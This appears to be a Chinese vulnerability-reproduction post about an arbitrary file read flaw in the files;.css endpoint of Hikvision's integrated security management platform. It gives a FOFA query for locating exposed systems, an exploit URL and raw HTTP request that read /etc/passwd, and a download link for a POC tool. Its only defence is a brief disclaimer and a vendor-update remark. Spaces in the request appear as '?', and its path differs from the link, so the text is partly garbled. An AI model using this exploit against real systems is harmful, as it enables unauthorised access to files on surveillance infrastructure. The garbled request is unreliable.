Hikvision综合安防管理平台files；.css接口存在任意文件读取漏洞 附POC软件

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. Hikvision综合安防管理平台简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备

2.漏洞描述

海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

海康威视集成化综合管理软件平台

Hikvision综合安防管理平台files;.css接口存在任意文件读取漏洞

4.fofa查询语句

body="/portal/skin/isee/redblack/"

5.漏洞复现

漏洞链接：https://127.0.0.1/lm/api/files;.css?link=/etc/passwd

漏洞数据包：

GET?/lm/api/files?link=/etc/passwd?HTTP/1.1
Host:?127.0.0.1
User-Agent:?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/114.0.0.0?Safari/537.36
Accept:?text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection:?Keep-Alive
Cache-Control:?max-age=0
Upgrade-Insecure-Requests:?1

6.POC&EXP

该POC工具下载地址：

链接：https://pan.baidu.com/s/1USrNnuSG7g-MQNsD2IsSfw?pwd=zpvh?
提取码：zpvh

7.整改意见

请联系厂商更新到安全版本 https://www.hikvision.com/

8.往期回顾